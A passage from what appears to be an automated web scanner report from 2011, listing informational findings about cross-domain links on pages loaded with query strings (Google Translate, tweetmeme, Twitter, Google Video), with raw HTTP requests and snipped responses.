<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=T1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="input_tts_button" style="" class=" tts_vertical_bt"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="input_tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...
<div id="tts_button" style="" class=" "><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...

20.533. http://translate.google.com/translate_t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/translate_t

Issue detail

The page was loaded from a URL containing a query string:

http://translate.google.com/translate_t?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wT

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=T1

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:37 GMT
Expires: Mon, 24 Jan 2011 16:02:37 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=58e54bef485bd12c:TM=1295884957:LM=1295884957:S=BeWfOb0gwP1Q71Gx; expires=Wed, 23-Jan-2013 16:02:37 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=T1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="input_tts_button" style="" class=" tts_vertical_bt"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="input_tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...
<div id="tts_button" style="" class=" "><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...

20.534. http://tweetmeme.com/eyewonder/interim.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/eyewonder/interim.html

Issue detail

The page was loaded from a URL containing a query string:

http://tweetmeme.com/eyewonder/interim.html?url=http://cdn.eyewonder.com/100125/767769/1411955/exp_Inc.js?interim=&clickTagFramePrepend=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3a99/3/0/%252a/w%253B233959639%253B0-0%253B0%253B57224923%253B2321-160/600%253B40054263/40072050/1%253B%253B%257Eokv%253D%253Bpc%253D%255BTPAS_ID%255D%253B%253B%257Eaopt%253D0/ff/ff/ff%253B%257Efdr%253D234359717%253B0-0%253B1%253B42955348%253B2321-160/600%253B40013631/40031418/1%253B%253B%257Eokv%253D%253Bsz%253D160x600%253Bfmzid%253D2673%253B%253Bfmcls%253DATF%253Btile%253D1%253Bqcseg%253DD%253Bqcseg%253DT%253Bqcseg%253D2891%253Bqcseg%253D2867%253Bqcseg%253D2866%253Bqcseg%253D2865%253Bqcseg%253D2363%253Bqcseg%253D2362%253Bqcseg%253D2355%253Bqcseg%253D2353%253Bqcseg%253D2352%253Bqcseg%253D2349%253Bqcseg%253D2339%253Bqcseg%253D1286%253Bqcseg%253D1160%253Bqcseg%253D1159%253Bqcseg%253D1156%253Bqcseg%253D1149%253Bqcseg%253D1148%253Bqcseg%253D983%253B%253B%257Eaopt%253D2/0/ff/0%253B%257Esscs%253D%253f%5Bewclickthru%5D&iframeURL=http%3A//ads.tweetmeme.com/serve.js%3Ftag%3Dhome%26width%3D300%26height%3D600%26rand%3D26297691596&stime=1295907710252&cb=1295907710252&guid=7gUQTFEThr@LSBUPErAIAN

The response contains the following link to another domain:

http://fav.or.it/

Request

GET /eyewonder/interim.html?url=http://cdn.eyewonder.com/100125/767769/1411955/exp_Inc.js?interim=&clickTagFramePrepend=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3a99/3/0/%252a/w%253B233959639%253B0-0%253B0%253B57224923%253B2321-160/600%253B40054263/40072050/1%253B%253B%257Eokv%253D%253Bpc%253D%255BTPAS_ID%255D%253B%253B%257Eaopt%253D0/ff/ff/ff%253B%257Efdr%253D234359717%253B0-0%253B1%253B42955348%253B2321-160/600%253B40013631/40031418/1%253B%253B%257Eokv%253D%253Bsz%253D160x600%253Bfmzid%253D2673%253B%253Bfmcls%253DATF%253Btile%253D1%253Bqcseg%253DD%253Bqcseg%253DT%253Bqcseg%253D2891%253Bqcseg%253D2867%253Bqcseg%253D2866%253Bqcseg%253D2865%253Bqcseg%253D2363%253Bqcseg%253D2362%253Bqcseg%253D2355%253Bqcseg%253D2353%253Bqcseg%253D2352%253Bqcseg%253D2349%253Bqcseg%253D2339%253Bqcseg%253D1286%253Bqcseg%253D1160%253Bqcseg%253D1159%253Bqcseg%253D1156%253Bqcseg%253D1149%253Bqcseg%253D1148%253Bqcseg%253D983%253B%253B%257Eaopt%253D2/0/ff/0%253B%257Esscs%253D%253f%5Bewclickthru%5D&iframeURL=http%3A//ads.tweetmeme.com/serve.js%3Ftag%3Dhome%26width%3D300%26height%3D600%26rand%3D26297691596&stime=1295907710252&cb=1295907710252&guid=7gUQTFEThr@LSBUPErAIAN HTTP/1.1
Host: tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=600&rand=26297691596
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.1.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983; __csref=; __cst=c361a3372a99df5c; __csv=286f8b371579253c; __csnv=2d2e35941c7237e0; __ctl=286f8b371579253c1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:21:05 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 5.8889389038086E-5
X-Served-In: 0.00093817710876465
Content-Length: 1221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<br />© Copyright <a href="http://fav.or.it">fav.or.it</a>
...[SNIP]...

20.535. http://tweetmeme.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://tweetmeme.com/search?q={searchTerms}

The response contains the following link to another domain:

http://fav.or.it/

Request

GET /search?q={searchTerms} HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:00:58 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 7.8201293945312E-5
X-Served-In: 0.0012500286102295
Content-Length: 1221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<br />© Copyright <a href="http://fav.or.it">fav.or.it</a>
...[SNIP]...

20.536. http://tweetmeme.com/story.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story.php

Issue detail

The page was loaded from a URL containing a query string:

http://tweetmeme.com/story.php?url=

The response contains the following link to another domain:

http://fav.or.it/

Request

GET /story.php?url= HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:00:06 GMT
Content-Type: text/html
Connection: close
Content-Length: 1221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<br />© Copyright <a href="http://fav.or.it">fav.or.it</a>
...[SNIP]...

20.537. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/?q=

The response contains the following links to other domains:

http://a0.twimg.com/a/1295646587/images/fronts/logo_withbird_home.png
http://a0.twimg.com/a/1295646587/images/whatsnew/video-sample-ss.png
http://a0.twimg.com/a/1295646587/stylesheets/fronts.css?1295901448
http://a0.twimg.com/profile_images/1183095306/977f61bc-d776-406d-bbfa-322d99f9e6ab_normal.jpg
http://a0.twimg.com/profile_images/422212230/lacoste_icon_normal.jpg
http://a0.twimg.com/profile_images/53798835/snake_cobra_commander_normal.gif
http://a1.twimg.com/a/1295646587/images/favicon.ico
http://a1.twimg.com/a/1295646587/images/twitter_57.png
http://a1.twimg.com/profile_images/112254859/GuyFieri_photo1_white_normal.jpg
http://a1.twimg.com/profile_images/139099981/4CAAA_copy_88v2_normal.jpg
http://a1.twimg.com/profile_images/675689885/studio_d06_normal.jpg
http://a1.twimg.com/profile_images/688563731/maud_newton_normal.jpg
http://a1.twimg.com/profile_images/952444947/twitter_logo_bigger.gif_normal.png
http://a2.twimg.com/a/1295646587/javascripts/fronts.js
http://a2.twimg.com/a/1295646587/javascripts/widgets/widget.js?1295901448
http://a2.twimg.com/profile_images/1155883473/mail_normal.jpeg
http://a2.twimg.com/profile_images/1161908472/5154528687_bdf5cbb92f_o_normal.jpg
http://a2.twimg.com/profile_images/117655834/twitter_blog_realtimeecon_normal.jpg
http://a2.twimg.com/profile_images/1213095644/CBS-eye-white-bg_normal.jpg
http://a2.twimg.com/profile_images/49246432/jdmisha_small_normal.jpg
http://a2.twimg.com/profile_images/61530666/hammer_normal.jpg
http://a2.twimg.com/profile_images/818033855/Picture_3_normal.png
http://a3.twimg.com/profile_images/1129460752/Twit_normal.png
http://a3.twimg.com/profile_images/541529457/Hawaii_15425_MarcoProsch_normal.jpg
http://a3.twimg.com/profile_images/71029746/Kjerstin_normal.jpg
http://a3.twimg.com/profile_images/77702637/outlet_thumbnail_1_normal.jpg
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /?q= HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:10:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910602-49620-38335
ETag: "3681f68f05a59f8a42626fdd110f0f5e"
Last-Modified: Mon, 24 Jan 2011 23:10:02 GMT
X-Runtime: 0.08485
Content-Type: text/html; charset=utf-8
Content-Length: 42958
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910600694364; path=/; expires=Mon, 31-Jan-11 23:10:00 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591060236158132; path=/; expires=Wed, 23 Feb 2011 23:10:02 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYmQ2ZWI3ZWQ4ZmJkOTQyNzE3NDdlZDQyYjBjMjM4%250AY2I6B2lkIiUyOTM4NTVjOTBiODZjZmY2YTJhMmE1ZDJkODc0MTAxNyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwh7hkq6%250ALQE%253D--4d7ff12d14d98e2870af1c579320deda6f99aadf; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1295646587/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1295646587/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a0.twimg.com/a/1295646587/stylesheets/fronts.css?1295901448" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1295646587/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1295646587/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
<a href="/Kjer" class="avatar-sm" hreflang="en" id="icon_Kjer" rel="Kjer" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/71029746/Kjerstin_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Kjer" class="avatar" hreflang="en" target="_blank"><img alt="Kjer" border="0" height="48" src="http://a3.twimg.com/profile_images/71029746/Kjerstin_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/k4coleman" class="avatar-sm" hreflang="en" id="icon_k4coleman" rel="k4coleman" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/1155883473/mail_normal.jpeg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/k4coleman" class="avatar" hreflang="en" target="_blank"><img alt="k4coleman" border="0" height="48" src="http://a2.twimg.com/profile_images/1155883473/mail_normal.jpeg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/iamjonsi" class="avatar-sm" hreflang="en" id="icon_iamjonsi" rel="iamjonsi" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/675689885/studio_d06_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/iamjonsi" class="avatar" hreflang="en" target="_blank"><img alt="iamjonsi" border="0" height="48" src="http://a1.twimg.com/profile_images/675689885/studio_d06_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/majornelson" class="avatar-sm" hreflang="en" id="icon_majornelson" rel="majornelson" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/1161908472/5154528687_bdf5cbb92f_o_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/majornelson" class="avatar" hreflang="en" target="_blank"><img alt="majornelson" border="0" height="48" src="http://a2.twimg.com/profile_images/1161908472/5154528687_bdf5cbb92f_o_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/DailyHealthTips" class="avatar-sm" hreflang="en" id="icon_DailyHealthTips" rel="DailyHealthTips" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/1129460752/Twit_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/DailyHealthTips" class="avatar" hreflang="en" target="_blank"><img alt="DailyHealthTips" border="0" height="48" src="http://a3.twimg.com/profile_images/1129460752/Twit_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/estria" class="avatar-sm" hreflang="en" id="icon_estria" rel="estria" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/541529457/Hawaii_15425_MarcoProsch_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/estria" class="avatar" hreflang="en" target="_blank"><img alt="estria" border="0" height="48" src="http://a3.twimg.com/profile_images/541529457/Hawaii_15425_MarcoProsch_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/LACOSTE" class="avatar-sm" hreflang="en" id="icon_LACOSTE" rel="LACOSTE" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/422212230/lacoste_icon_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/LACOSTE" class="avatar" hreflang="en" target="_blank"><img alt="LACOSTE" border="0" height="48" src="http://a0.twimg.com/profile_images/422212230/lacoste_icon_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/CBSNews" class="avatar-sm" hreflang="en" id="icon_CBSNews" rel="CBSNews" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/1213095644/CBS-eye-white-bg_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/CBSNews" class="avatar" hreflang="en" target="_blank"><img alt="CBSNews" border="0" height="48" src="http://a2.twimg.com/profile_images/1213095644/CBS-eye-white-bg_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/DellOutlet" class="avatar-sm" hreflang="en" id="icon_DellOutlet" rel="DellOutlet" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/77702637/outlet_thumbnail_1_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/DellOutlet" class="avatar" hreflang="en" target="_blank"><img alt="DellOutlet" border="0" height="48" src="http://a3.twimg.com/profile_images/77702637/outlet_thumbnail_1_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/geologynews" class="avatar-sm" hreflang="en" id="icon_geologynews" rel="geologynews" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/61530666/hammer_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/geologynews" class="avatar" hreflang="en" target="_blank"><img alt="geologynews" border="0" height="48" src="http://a2.twimg.com/profile_images/61530666/hammer_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/SarahBrownUK" class="avatar-sm" hreflang="en" id="icon_SarahBrownUK" rel="SarahBrownUK" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/1183095306/977f61bc-d776-406d-bbfa-322d99f9e6ab_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/SarahBrownUK" class="avatar" hreflang="en" target="_blank"><img alt="SarahBrownUK" border="0" height="48" src="http://a0.twimg.com/profile_images/1183095306/977f61bc-d776-406d-bbfa-322d99f9e6ab_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/maudnewton" class="avatar-sm" hreflang="en" id="icon_maudnewton" rel="maudnewton" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/688563731/maud_newton_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/maudnewton" class="avatar" hreflang="en" target="_blank"><img alt="maudnewton" border="0" height="48" src="http://a1.twimg.com/profile_images/688563731/maud_newton_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/AAA_Travel" class="avatar-sm" hreflang="en" id="icon_AAA_Travel" rel="AAA_Travel" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/139099981/4CAAA_copy_88v2_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/AAA_Travel" class="avatar" hreflang="en" target="_blank"><img alt="AAA_Travel" border="0" height="48" src="http://a1.twimg.com/profile_images/139099981/4CAAA_copy_88v2_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/ChefGuyFieri" class="avatar-sm" hreflang="en" id="icon_ChefGuyFieri" rel="ChefGuyFieri" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/112254859/GuyFieri_photo1_white_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/ChefGuyFieri" class="avatar" hreflang="en" target="_blank"><img alt="ChefGuyFieri" border="0" height="48" src="http://a1.twimg.com/profile_images/112254859/GuyFieri_photo1_white_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Arsenal" class="avatar-sm" hreflang="en" id="icon_Arsenal" rel="Arsenal" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/952444947/twitter_logo_bigger.gif_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Arsenal" class="avatar" hreflang="en" target="_blank"><img alt="Arsenal" border="0" height="48" src="http://a1.twimg.com/profile_images/952444947/twitter_logo_bigger.gif_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/CobraCommander" class="avatar-sm" hreflang="en" id="icon_CobraCommander" rel="CobraCommander" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/53798835/snake_cobra_commander_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/CobraCommander" class="avatar" hreflang="en" target="_blank"><img alt="CobraCommander" border="0" height="48" src="http://a0.twimg.com/profile_images/53798835/snake_cobra_commander_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/WSJ_Econ" class="avatar-sm" hreflang="en" id="icon_WSJ_Econ" rel="WSJ_Econ" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/117655834/twitter_blog_realtimeecon_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/WSJ_Econ" class="avatar" hreflang="en" target="_blank"><img alt="WSJ_Econ" border="0" height="48" src="http://a2.twimg.com/profile_images/117655834/twitter_blog_realtimeecon_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/feedback" class="avatar-sm" hreflang="en" id="icon_feedback" rel="feedback" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/818033855/Picture_3_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/feedback" class="avatar" hreflang="en" target="_blank"><img alt="feedback" border="0" height="48" src="http://a2.twimg.com/profile_images/818033855/Picture_3_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/jdickerson" class="avatar-sm" hreflang="en" id="icon_jdickerson" rel="jdickerson" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/49246432/jdmisha_small_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/jdickerson" class="avatar" hreflang="en" target="_blank"><img alt="jdickerson" border="0" height="48" src="http://a2.twimg.com/profile_images/49246432/jdmisha_small_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
</h2>

<script src="http://a2.twimg.com/a/1295646587/javascripts/widgets/widget.js?1295901448" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

20.538. http://twitter.com/share previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/share

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/share?url=

The response contains the following links to other domains:

http://s.twimg.com/images/favicon.ico
http://yui.yahooapis.com/3.1.1/build/cssfonts/fonts-min.css

Request

GET /share?url= HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Mon, 24 Jan 2011 23:08:27 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: 1295910507-68882-55229
Last-Modified: Mon, 24 Jan 2011 23:08:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910505558956; path=/; expires=Mon, 31-Jan-11 23:08:25 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591050734535652; path=/; expires=Wed, 23 Feb 2011 23:08:27 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWYzZjBhYmFhMmYzYTI2MWNmZjY2NmQ3Njc2ZmYxNWQwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIUhNJui0B--90f25d6b5108d9cf282a164d534e4ac3af8b2a9b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...
</title>
<link href="http://s.twimg.com/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link rel="stylesheet" href="http://yui.yahooapis.com/3.1.1/build/cssfonts/fonts-min.css" type="text/css" charset="utf-8">

<style type="text/css" media="screen">
...[SNIP]...

20.539. http://video.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.google.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://video.google.com/?hl=en&tab=wv

The response contains the following links to other domains:

http://googlevideo.blogspot.com/
http://www.youtube.com/?hl=en&tab=v1

Request

GET /?hl=en&tab=wv HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 16:02:43 GMT
Expires: Mon, 24 Jan 2011 16:02:43 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=470ac884b6ec430a:TM=1295884963:LM=1295884963:S=y89enf5jPoxriQRu; expires=Wed, 23-Jan-2013 16:02:43 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
